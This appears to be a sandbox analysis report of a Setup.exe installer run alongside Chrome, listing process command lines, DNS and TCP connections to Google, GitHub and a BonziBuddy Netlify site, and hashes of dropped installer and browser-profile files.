"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=2484 --field-trial-handle=1220,i,14937255884344643408,17197949225456008359,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 --field-trial-handle=1220,i,14937255884344643408,17197949225456008359,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=2580 --field-trial-handle=1220,i,14937255884344643408,17197949225456008359,131072 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.187.206:443 apis.google.com tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.46:443 play.google.com tcp
N/A 224.0.0.251:5353 udp
GB 142.250.187.196:443 www.google.com udp
GB 142.250.200.46:443 play.google.com udp
US 8.8.8.8:53 consent.google.com udp
GB 216.58.213.14:443 consent.google.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 github.githubassets.com udp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 185.199.108.133:443 avatars.githubusercontent.com tcp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
GB 216.58.213.10:443 content-autofill.googleapis.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 8.8.8.8:53 bonzibuddy.netlify.com udp
DE 18.192.94.96:443 bonzibuddy.netlify.com tcp
DE 18.192.94.96:443 bonzibuddy.netlify.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
GB 216.58.213.3:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 beacons.gvt2.com udp
GB 216.58.213.3:443 beacons.gcp.gvt2.com udp

Files

\fefeab4e7d649df28de52093ebac6b\Setup.exe

MD5 006f8a615020a4a17f5e63801485df46
SHA1 78c82a80ebf9c8bf0c996dd8bc26087679f77fea
SHA256 d273460aa4d42f0b5764383e2ab852ab9af6fecb3ed866f1783869f2f155d8be
SHA512 c603ed6f3611eb7049a43a190ed223445a9f7bd5651100a825917198b50c70011e950fa968d3019439afa0a416752517b1c181ee9445e02da3904f4e4b73ce76

C:\fefeab4e7d649df28de52093ebac6b\SetupEngine.dll

MD5 84c1daf5f30ff99895ecab3a55354bcf
SHA1 7e25ba36bcc7deed89f3c9568016ddb3156c9c5a
SHA256 7a0d281fa802d615ea1207bd2e9ebb98f3b74f9833bba3cb964ba7c7e0fb67fd
SHA512 e4fb7e4d39f094463fdcdc4895ab2ea500eb51a32b6909cec80a526bbf34d5c0eb98f47ee256c0f0865bf3169374937f047bf5c4d6762779c8ca3332b4103be3

C:\fefeab4e7d649df28de52093ebac6b\sqmapi.dll

MD5 3f0363b40376047eff6a9b97d633b750
SHA1 4eaf6650eca5ce931ee771181b04263c536a948b
SHA256 bd6395a58f55a8b1f4063e813ce7438f695b9b086bb965d8ac44e7a97d35a93c
SHA512 537be86e2f171e0b2b9f462ac7f62c4342beb5d00b68451228f28677d26a525014758672466ad15ed1fd073be38142dae478df67718908eae9e6266359e1f9e8

C:\Users\Admin\AppData\Local\Temp\HFI61A.tmp.html

MD5 cd131d41791a543cc6f6ed1ea5bd257c
SHA1 f42a2708a0b42a13530d26515274d1fcdbfe8490
SHA256 e139af8858fe90127095ac1c4685bcd849437ef0df7c416033554703f5d864bb
SHA512 a6ee9af8f8c2c7acd58dd3c42b8d70c55202b382ffc5a93772af7bf7d7740c1162bb6d38a4307b1802294a18eb52032d410e128072af7d4f9d54f415be020c9a

C:\fefeab4e7d649df28de52093ebac6b\UiInfo.xml

MD5 8b8b0a935dc591799a0c6d52fdc33460
SHA1 ce2748bd469aad6e90b06d98531084d00611fb89
SHA256 57a9ccb84cae42e0d8d1a29cfe170ac3f27bdcae829d979cddfd5e757519b159
SHA512 93009b3045939b65a0c1d25e30a07a772bd73dda518529462f9ce1227a311a4d6fd7595f10b4255cc0b352e09c02026e89300a641492f14df908ad256a3c9d76

C:\fefeab4e7d649df28de52093ebac6b\ParameterInfo.xml

MD5 7213da83e0f0b8ae4fea44ae1cb7f62b
SHA1 f2e3fcc77a1ad4d042253bd2e0010bcb40b68ed3
SHA256 59e67e4fb46e5490eee63d8b725324f1372720ade7345c74c6138c4a76ea73d9
SHA512 86186ab0f2cb38e520dd1284042eced157f96874846eb9061be9cf56b84a1cab5901a4879e105a8b04b336bbc43b03f4bdf198d43af868be188602347db829e0

C:\fefeab4e7d649df28de52093ebac6b\1032\LocalizedData.xml

MD5 3bf8da35b14fbcc564e03f6342bb71f2
SHA1 8f9139f0bb813bf95f8c437548738d32848d8940
SHA256 39efe12c689edfea041613b0e4d6ec78afec8fe38a0e4adc656591ffef8f415d
SHA512 31b050647ba4bd0c2762d77307e1ed2a324e9b152c06ed496b86ea063cdc18bf2bb1f08d2e9b4af3429a2bc333d7891338d7535487c83495304a5f78776dbc03

C:\fefeab4e7d649df28de52093ebac6b\SplashScreen.bmp

MD5 0966fcd5a4ab0ddf71f46c01eff3cdd5
SHA1 8f4554f079edad23bcd1096e6501a61cf1f8ec34
SHA256 31c13ecfc0eb27f34036fb65cc0e735cd444eec75376eea2642f926ac162dcb3
SHA512 a9e70a2fb5a9899acf086474d71d0e180e2234c40e68bcadb9bf4fe145774680cb55584b39fe53cc75de445c6bf5741fc9b15b18385cbbe20fc595fe0ff86fce

C:\fefeab4e7d649df28de52093ebac6b\1038\LocalizedData.xml

MD5 89d4356e0f226e75ca71d48690e8ec15
SHA1 2336caa971527977f47512bc74e88cec3f770c7d
SHA256 fcbb619deb2d57b791a78954b0342dbb2fef7ddd711066a0786c8ef669d2b385
SHA512 fa03d55a4aafe94cbf5c134a65bd809fc86c042bc1b8ffbc9a2a5412eb70a468551c05c44b6ce81f638df43cca599aa1dd6f42f2df3012c8a95a3612df7c821e

C:\fefeab4e7d649df28de52093ebac6b\1040\LocalizedData.xml

MD5 eda1ec689d45c7faa97da4171b1b7493
SHA1 807fe12689c232ebd8364f48744c82ca278ea9e6
SHA256 80faa30a7592e8278533d3380dcb212e748c190aaeef62136897e09671059b36
SHA512 8385a5de4eb6b38169dd1eb03926bc6d4604545801f13d99cee3acede3d34ec9f9d96b828a23ae6246809dc666e67f77a163979679956297533da40f9365bf2c

C:\fefeab4e7d649df28de52093ebac6b\1046\LocalizedData.xml

MD5 a03d2063d388fc7a1b4c36d85efa5a1a
SHA1 88bd5e2ff285ee421ccc523f7582e05a8c3323f8
SHA256 61d8339e89a9e48f8ae2d929900582bb8373f08d553ec72d5e38a0840b47c8a3
SHA512 3a219f36e57d90ca92e9faec4dfd34841c2c9244da4fe7e1d70608dde7857aa36325bdb46652a42922919f782bb7c97f567e69a9fc51942722b8fd66cd4ecaf0

C:\fefeab4e7d649df28de52093ebac6b\2070\LocalizedData.xml

MD5 7fa9926a4bc678e32e5d676c39f8fb97
SHA1 bba4311dd30261a9b625046f8a6ea215516c9213
SHA256 a25ee75c78c24c50440ad7de9929c6a6e1cc0629009dc0d01b90cbac177dd404
SHA512 e06423bc1ea50a566d341dc513828608e9b6611fea81d33fca471a38f6b2b61b556ea07a5dec0830f3e87194975d87f267a5e5e1a2be5e6a86b07c5bb2bddcb6

C:\fefeab4e7d649df28de52093ebac6b\2052\LocalizedData.xml

MD5 10da125eeabcbb45e0a272688b0e2151
SHA1 6c4124ec8ca2d03b5187ba567c922b6c3e5efc93
SHA256 1842f22c6fd4caf6ad217e331b74c6240b19991a82a1a030a6e57b1b8e9fd1ec
SHA512 d968abd74206a280f74bf6947757cca8dd9091b343203e5c2269af2e008d3bb0a17ff600eb961dbf69a93de4960133ade8d606fb9a99402d33b8889f2d0da710

C:\fefeab4e7d649df28de52093ebac6b\1055\LocalizedData.xml

MD5 65e771fed28b924942a10452bbbf5c42
SHA1 586921b92d5fb297f35effc2216342dac1ae2355
SHA256 45e30569a756d9bcbc5f9dae78bda02751fd25e1c0aee471ce112cb4464a6ee2
SHA512 d014a2a96f3a5c487ef1caddd69599dbec15da5ad689d68009f1ca4d5cb694105a7903f508476d6ffec9d81386cb184df6fc428d34f056190cee30715514a8f7

C:\fefeab4e7d649df28de52093ebac6b\1053\LocalizedData.xml

MD5 b3b1a89458bec6af82c5386d26639b59
SHA1 d9320b8cc862f40c65668a40670081079b63cea1
SHA256 1ef312e8be9207466fbfdecee92bfc6c6b7e2da61979b0908eaf575464e7b7a0
SHA512 478ce08619490ed1ecdd8751b5f60da1ee4ac0d08d9a97468c3f595ac4376feca59e9c72dd9c83b00c8d78b298be757c6f24a422b7be8c041f780524844998bf

C:\fefeab4e7d649df28de52093ebac6b\1049\LocalizedData.xml

MD5 349b52a81342a7afb8842459e537ecc6
SHA1 6268343e82fbbabe7618bd873335a8f9f84ed64d
SHA256 992bf5aeb06aa3701d50c23fa475b4b86d8997383c9f0e3425663cfbd6b8a2a5
SHA512 ef4cbd3f7f572a9f146a524cfbc2efbd084e6c70a65b96a42339adc088e3f0524bc202548340969481e7f3df3ac517ac34b200b56a3b9957802abd0efa951c49

C:\fefeab4e7d649df28de52093ebac6b\1045\LocalizedData.xml

MD5 bdb583c7a48f811be3b0f01fcea40470
SHA1 e8453946a6b926e4f4ae5b02ba1d648daf23e133
SHA256 611b7b7352188adffd6380b9c8a85b8ff97c09a1c293bb7ac0ef5478a0e18ac8
SHA512 27b02226f8f86ca4d00789317c79e8ca0089f5b910bed14aa664eeab6be66e98de3bafd7670c895d70ab9c34ece5f05199f3556fddc1b165904e3432a51c008d

C:\fefeab4e7d649df28de52093ebac6b\1043\LocalizedData.xml

MD5 6506b4e64ebf6121997fa227e762589f
SHA1 71bc1478c012d9ec57fc56a5266dd325b7801221
SHA256 415112ae783a87427c2fadd7b010ade4f1a7c23b27e4b714b7b507c16b572a1c
SHA512 39024ea9d42352f7c1bd6fefe0574054eceb4059f773cfaeb26c42faada2540ae95fb34718d30ccb6da157d2597f80d12a024461fbd0e8d510431ba6ffa81ec2

C:\fefeab4e7d649df28de52093ebac6b\1042\LocalizedData.xml

MD5 78c16da54542c9ed8fa32fed3efaf10d
SHA1 ad8cfe972c8a418c54230d886e549e00c7e16c40
SHA256 e3e3a2288ff840ab0e7c5e8f7b4cfb1f26e597fb17cfc581b7728116bd739ed1
SHA512 d9d7bb82a1d752a424bf81be3d86abea484acbb63d35c90a8ee628e14cf34a7e8a02f37d2ea82aa2ce2c9aa4e8416a7a6232c632b7655f2033c4aaab208c60bf

C:\fefeab4e7d649df28de52093ebac6b\1041\LocalizedData.xml

MD5 64ffa6ff8866a15aff326f11a892bead
SHA1 378201477564507a481ba06ea1bc0620b6254900
SHA256 7570390094c0a199f37b8f83758d09dd2cecd147132c724a810f9330499e0cbf
SHA512 ea5856617b82d13c9a312cb4f10673dbc4b42d9ac5703ad871e8bdfcc6549e262e61288737ab8ebcf77219d24c0822e7dacf043d1f2d94a97c9b7ec0a5917ef2

C:\fefeab4e7d649df28de52093ebac6b\1037\LocalizedData.xml

MD5 16e6416756c1829238ef1814ebf48ad6
SHA1 c9236906317b3d806f419b7a98598dd21e27ad64
SHA256 c0ee256567ea26bbd646f019a1d12f3eced20b992718976514afa757adf15dea
SHA512 aa595ed0b3b1db280f94b29fa0cb9db25441a1ef54355abf760b6b837e8ce8e035537738e666d27dd2a8d295d7517c325a5684e16304887ccb17313ca4290ce6

C:\fefeab4e7d649df28de52093ebac6b\1036\LocalizedData.xml

MD5 1dad88faed661db34eef535d36563ee2
SHA1 0525b2f97eddbd26325fddc561bf8a0cda3b0497
SHA256 9605468d426bcbbe00165339d84804e5eb2547bfe437d640320b7bfef0b399b6
SHA512 ccd0bffbf0538152cccd4b081c15079716a5ff9ad04cee8679b7f721441f89eb7c6f8004cff7e1dde9188f5201f573000d0c078474edf124cfa4c619e692d6bc

C:\fefeab4e7d649df28de52093ebac6b\1044\LocalizedData.xml

MD5 120104fa24709c2a9d8efc84ff0786cd
SHA1 b513fa545efae045864d8527a5ec6b6cebe31bb9
SHA256 516525636b91c16a70aef8d6f6b424dc1ee7f747b8508b396ee88131b2bb0947
SHA512 1ea8eb2be9d5f4ef6f1f2c0d90cb228a9bb58d7143ccafe77e18ce52ec4aca25dde0ba18430fd4d3d7962d079ccbe7e2552b2c7090361e03c6fdfb7c2b9c7325

C:\fefeab4e7d649df28de52093ebac6b\1035\LocalizedData.xml

MD5 1aa252256c895b806e4e55f3ea8d5ffb
SHA1 0322ee94c3d5ea26418a2fea3f7e62ec5d04b81d
SHA256 8a68b3b6522c30502202ecb8d16ae160856947254461ac845b39451a3f2db35f
SHA512 ce57784892c0be55a00ced0adc594a534d8a40819790ca483a29b6cd544c7a75ae4e9bde9b6dc6de489ceceb7883b7c2ea0e98a38fcc96d511157d61c8aa3e63

C:\fefeab4e7d649df28de52093ebac6b\1031\LocalizedData.xml

MD5 8505219c0a8d950ff07dc699d8208309
SHA1 7a557356c57f1fa6d689ea4c411e727438ac46df
SHA256 c48986cdb7fe3401234e0a6540eb394c1201846b5beb1f12f83dc6e14674873a
SHA512 7bcdad0cb4b478068434f4ebd554474b69562dc83df9a423b54c1701ca3b43c3b92de09ee195a86c0d244aa5ef96c77b1a08e73f1f2918c8ac7019f8df27b419

C:\fefeab4e7d649df28de52093ebac6b\1030\LocalizedData.xml

MD5 69925e463a6fedce8c8e1b68404502fb
SHA1 76341e490a432a636ed721f0c964fd9026773dd7
SHA256 5f370d2ccdd5fa316bce095bf22670123c09de175b7801d0a77cdb68174ac6b7
SHA512 5f61abec49e1f9cc44c26b83aa5b32c217ebeba63ed90d25836f51f810c59f71ec7430dc5338efba9be720f800204891e5ab9a5f5ec1ff51ef46c629482e5220

C:\fefeab4e7d649df28de52093ebac6b\1029\LocalizedData.xml

MD5 0b6ed582eb557573e959e37ebe2fca6a
SHA1 82c19c7eafb28593f453341eca225873fb011d4c
SHA256 8a0da440261940ed89bad7cd65bbc941cc56001d9aa94515e346d57b7b0838fc
SHA512 aba3d19f408bd74f010ec49b31a2658e0884661d2efda7d999558c90a4589b500570cc80410ba1c323853ca960e7844845729fff708e3a52ea25f597fad90759

C:\fefeab4e7d649df28de52093ebac6b\1028\LocalizedData.xml

MD5 967a6d769d849c5ed66d6f46b0b9c5a4
SHA1 c0ff5f094928b2fa8b61e97639c42782e95cc74f
SHA256 0bc010947bff6ec1ce9899623ccfdffd702eee6d2976f28d9e06cc98a79cf542
SHA512 219b13f1beeb7d690af9d9c7d98904494c878fbe9904f8cb7501b9bb4f48762f9d07c3440efa0546600ff62636ac34cb4b32e270cf90cb47a9e08f9cb473030c

C:\fefeab4e7d649df28de52093ebac6b\1025\LocalizedData.xml

MD5 c5bf74c96a711b3f7004ca6bddecc491
SHA1 4c4d42ff69455f267ce98f1db8f2c5d76a1046da
SHA256 6b67c8a77c1a637b72736595afdf77bdb3910aa9fe48d959775806a0683ffa66
SHA512 2f2071bf9966bffe64c90263f4b9bd5efcac4f976c4e42fbdeaa5d6a6dee51c33f4902cf5e3d0897e1c841e9182e25c86d42e392887bc3ce3d9ed3d780d96ac9

C:\fefeab4e7d649df28de52093ebac6b\1033\LocalizedData.xml

MD5 326518603d85acd79a6258886fc85456
SHA1 f1cef14bc4671a132225d22a1385936ad9505348
SHA256 665797c7840b86379019e5a46227f888fa1a36a593ea41f9170ef018c337b577
SHA512 f8a514efd70e81d0f2f983282d69040bca6e42f29aa5df554e6874922a61f112e311ad5d2b719b6ca90012f69965447fb91e8cd4103efb2453ff160a9062e5d3

C:\fefeab4e7d649df28de52093ebac6b\3082\LocalizedData.xml

MD5 2d54fe70376db0218e8970b28c1c4518
SHA1 83ee9ac93142751f23d5bb858f7264e27ea2eab0
SHA256 d17c5b638e2a4d43212d21a2052548c8d4909eb6410e30b8a951a292bcdbbedd
SHA512 20c0fb9a046911bc2d702ab321c3992262ac0f80f33ddda5ec2ccafe9ef07611774223369e0dc7cb91c9cda1cbd65c598a7e1c914d6e6ca4b00205a16411be30

\fefeab4e7d649df28de52093ebac6b\SetupUi.dll

MD5 eb881e3dddc84b20bd92abcec444455f
SHA1 e2c32b1c86d4f70e39de65e9ebc4f361b24ff4a1
SHA256 11565d97287c01d22ad2e46c78d8a822fa3e6524561d4c02dfc87e8d346c44e7
SHA512 5750cec73b36a3f19bfb055f880f3b6498a7ae589017333f6272d26f1c72c6f475a3308826268a098372bbb096b43fbd1e06e93eecc0a81046668228bc179a75

C:\fefeab4e7d649df28de52093ebac6b\SetupUi.xsd

MD5 2fadd9e618eff8175f2a6e8b95c0cacc
SHA1 9ab1710a217d15b192188b19467932d947b0a4f8
SHA256 222211e8f512edf97d78bc93e1f271c922d5e91fa899e092b4a096776a704093
SHA512 a3a934a8572ff9208d38cf381649bd83de227c44b735489fd2a9dc5a636ead9bb62459c9460ee53f61f0587a494877cd3a3c2611997be563f3137f8236ffc4ca

C:\fefeab4e7d649df28de52093ebac6b\Strings.xml

MD5 8a28b474f4849bee7354ba4c74087cea
SHA1 c17514dfc33dd14f57ff8660eb7b75af9b2b37b0
SHA256 2a7a44fb25476886617a1ec294a20a37552fd0824907f5284fade3e496ed609b
SHA512 a7927700d8050623bc5c761b215a97534c2c260fcab68469b7a61c85e2dff22ed9cf57e7cb5a6c8886422abe7ac89b5c71e569741db74daa2dcb4152f14c2369

\fefeab4e7d649df28de52093ebac6b\1033\SetupResources.dll

MD5 9547d24ac04b4d0d1dbf84f74f54faf7
SHA1 71af6001c931c3de7c98ddc337d89ab133fe48bb
SHA256 36d0159ed1a7d88000737e920375868765c0a1dd6f5a5acbb79cf7d97d9e7a34
SHA512 8b6048f4185a711567679e2de4789407077ce5bfe72102d3cb1f23051b8d3e6bfd5886c801d85b4e62f467dd12da1c79026a4bc20b17f54c693b2f24e499d40f

memory/2040-267-0x0000000000460000-0x0000000000461000-memory.dmp

C:\fefeab4e7d649df28de52093ebac6b\graphics\save.ico

MD5 7d62e82d960a938c98da02b1d5201bd5
SHA1 194e96b0440bf8631887e5e9d3cc485f8e90fbf5
SHA256 ae041c8764f56fd89277b34982145d16fc59a4754d261c861b19371c3271c6e5
SHA512 ab06b2605f0c1f6b71ef69563c0c977d06c6ea84d58ef7f2baecba566d6037d1458c2b58e6bfd70ddef47dccbdea6d9c2f2e46dea67ea9e92457f754d7042f67

C:\fefeab4e7d649df28de52093ebac6b\graphics\print.ico

MD5 7e55ddc6d611176e697d01c90a1212cf
SHA1 e2620da05b8e4e2360da579a7be32c1b225deb1b
SHA256 ff542e32330b123486797b410621e19eafb39df3997e14701afa4c22096520ed
SHA512 283d381aa396820b7e15768b20099d67688da1f6315ec9f7938c2fcc3167777502cded0d1beddf015a34cc4e5d045bcb665ffd28ba2fbb6faf50fdd38b31d16e

C:\fefeab4e7d649df28de52093ebac6b\graphics\warn.ico

MD5 b2b1d79591fca103959806a4bf27d036
SHA1 481fd13a0b58299c41b3e705cb085c533038caf5
SHA256 fe4d06c318701bf0842d4b87d1bad284c553baf7a40987a7451338099d840a11
SHA512 5fe232415a39e0055abb5250b120ccdcd565ab102aa602a3083d4a4705ac6775d45e1ef0c2b787b3252232e9d4673fc3a77aab19ec79a3ff8b13c4d7094530d2

C:\fefeab4e7d649df28de52093ebac6b\graphics\setup.ico

MD5 3d25d679e0ff0b8c94273dcd8b07049d
SHA1 a517fc5e96bc68a02a44093673ee7e076ad57308
SHA256 288e9ad8f0201e45bc187839f15aca79d6b9f76a7d3c9274c80f5d4a4c219c0f
SHA512 3bde668004ca7e28390862d0ae9903c756c16255bdbb3f7e73a5b093ce6a57a3165d6797b0a643b254493149231aca7f7f03e0af15a0cbe28aff02f0071ec255

memory/2040-272-0x0000000000460000-0x0000000000461000-memory.dmp

\??\pipe\crashpad_2080_ZLGPHWWORLICEAVL

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

MD5 18e723571b00fb1694a3bad6c78e4054
SHA1 afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA256 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA512 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 30f80eecaeaaf757c00124cef4eefe93
SHA1 dd73fd7595e87c1f5c47f7a5f18ee067623b8cd7
SHA256 c2e30b3cd14b814f285e876665b76080a127f4569b490b9d1c161af45548f2a7
SHA512 dbd2823ad58772edbebd9c5fd1843398165676e3ad240688264ae797a1df679cbccb4e75cecfadce0ccdfafdf4725760454ced84336d79708be790c229c53a89

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 6dcc05a6c79adaccd1a1f8e54bc2c709
SHA1 27e4bb60960f60f6477771fbf9f9fe577289067b
SHA256 302dadb74400d8f93590d78e862a22269fe712ef90c023df4075bd7eba45a310
SHA512 4b2f9103c94c94513b0cfcb964e0efa3fadc4a02e0c4ef7fa1745f260ab94286fc88fbcb420559ceff03dc61e96e5bc40c507c145f8bcd8c683ce12c1403a4bb

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 473ed62ac9d1d8672b16f009032bcbd0
SHA1 d6b6823193e39110801d80b3611140cb1d6e1c26
SHA256 356dc78ba12a79f2fd404597a286ff99e80cf5eba26e84f12524c56293438ede
SHA512 e5e861cd8a8e816b3a798dfbe21fcf97ae83bb533dc22eed03176fb86b72dd9fc3261bcf1860dc57270c20b4fa87552989888409f6c0243dc1eb5847b7ec8f1c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar7A74.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 31dea45887be9ff09fb651d540b06929
SHA1 b7c104047d2f45e668ecc568a2099e6bb44f40ac
SHA256 bc361dee6107253b55aee48348607e077826f5662f7d340bf02ba6aec3fbccee
SHA512 77ba8be62052e093343e74a87d467444fa440119b514d253ba876e27ed0fddc77e23bfd46f842ec31118b1da61eabff93b72a177ce226193f158f743f5d3d45c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 596daaf0b9be2bf09a6bf25d2e69d331
SHA1 237abdaba868264568e891de2236b81bb3aceb64
SHA256 13b00739794a2297c79754eaa5bca4de3e6507b69cdc06ca3e968d97fb15f018
